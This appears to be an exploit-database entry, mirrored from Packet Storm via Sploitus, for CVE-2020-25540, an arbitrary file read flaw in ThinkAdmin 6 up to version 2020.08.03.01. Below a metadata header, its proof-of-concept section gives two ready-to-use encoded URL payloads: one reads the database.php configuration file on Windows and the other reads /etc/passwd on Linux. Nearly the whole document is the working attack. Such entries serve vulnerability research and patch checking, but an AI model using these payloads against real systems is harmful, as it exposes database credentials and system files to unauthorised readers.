Share
## https://sploitus.com/exploit?id=PACKETSTORM:159177
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read  
# Google Dork: N/A  
# Date: 2020-09-14  
# Exploit Author: Hzllaga  
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/  
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a  
# Version: v6 <= 2020.08.03.01  
# Tested on: PHP7.4.7,Apache  
# CVE : CVE-2020-25540  
  
PoC:  
On Windows read database.php payload:  
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34  
  
On Linux read /etc/passwd payload:  
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s